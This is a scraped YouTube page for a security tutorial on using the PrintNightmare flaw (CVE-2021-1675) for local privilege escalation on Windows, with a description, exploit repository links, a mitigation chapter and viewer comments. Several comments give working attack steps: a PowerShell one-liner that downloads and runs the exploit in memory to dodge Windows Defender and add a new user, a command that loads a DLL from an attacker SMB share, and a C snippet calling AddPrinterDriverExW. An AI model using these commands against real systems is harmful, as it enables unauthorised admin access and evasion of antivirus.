Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation
Вставка
- Опубліковано 26 чер 2024
- The exploit abuses the Print Spooler in Windows to load malicious DLL files. This video shows how this exploit is being used as a local privilege escalation, along with how to mitigate against these attacks. Check out the next video to see how this same vulnerability can be used for Remote Code Execution against a Domain Controller.
Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.
Please consider sharing with a friend, hitting the like button, and subscribing!
Github Resources mentioned in this video:
github.com/calebstewart/CVE-2...
github.com/cube0x0/CVE-2021-1675
Part Two:
• Abusing PrintNightmare...
👇 SUBSCRIBE TO INFINITELOGINS UA-cam CHANNEL NOW 👇
ua-cam.com/users/infinitelog...
00:00 - Intro
00:50 - Exploits on Github
02:50 - Reviewing Environment
05:40 - Running Exploit
10:00 - Mitigation
___________________________________________
Social Media:
Website: infinitelogins.com/
Twitter: / infinitelogins
Twitch: / infinitelogins
___________________________________________
Donations and Support:
Like my content? Please consider supporting me on Patreon:
/ infinitelogins
Purchase a VPN Using my Affiliate Link
www.privateinternetaccess.com...
___________________________________________
#CVE #PrintNightmare #WindowsVulnerablility
Part 2 show Remote Code Execution against a Domain Controller will be available today at 2 PM PDT - Check link in description!
Best explanation so far
Glad you liked it
Nice explanation , Can the next video be about kerberos delegations ?
Noted
One thing would like to see within your channel is AV evasion and stuff like that anyways its great to watch your videos
Thanks! AV evasion is tough one since it changes so much - and definitely not my strong suit. I'll share it as soon as I learn more about it!
@@InfiniteLogins Yeah sure thanks for looking into it. Hoping to see soon
cool
When you run the script, do you have the "Point and Print" GPO enabled? Thank you
Not sure, it's a mostly default config.
Hi mate, been trying to do this for a uni assignment, and I have been getting some errors trying this on Windows 7, could you please recommend a link or method to get an ISO for the Win10 virtual machine like yours, and also any set up or adjustments that need to be made? Thank you heaps
This isn't going to have any problems with UA-cam censorship =p.
Thanks for the videos tho, been searching around for the powershell script for this
Shouldn't. Nothing malicious about this and I have others on the channel just like it.
🤞
When i tried to connect user victim and password victim, it worked. However, I tried to connect that doesn't used password, it didnt worked. The command used:
Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll
..... now, i can't connect if victim doesn't password.
Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up:
iex(iwr raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe"
:) hope that helps
put this here cause i was testing it along with the video and noticed Defender didn't like that lol ;)
Thanks!
@@InfiniteLogins npnp!
Is this really your typing speed? How many words per minute are you typing? LOL
Haha, that's me!
While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...
Everyone says it works on all versions of windows, BUT IT DOESNT WORK ON WINDOWS 7!
This:
DRIVER_INFO_2W di = {};
di.cVersion = 3;
di.pName = (LPWSTR)L"1111";
di.pEnvironment = (LPWSTR)L"Windows x64";
di.pDataFile = (LPWSTR)DLL_PATH;
di.pConfigFile = (LPWSTR)DLL_PATH;
di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL";
AddPrinterDriverExW(0, 2, (PBYTE) & di, 0);
This gives error 5 on win7, on win10 before 21h2 it works.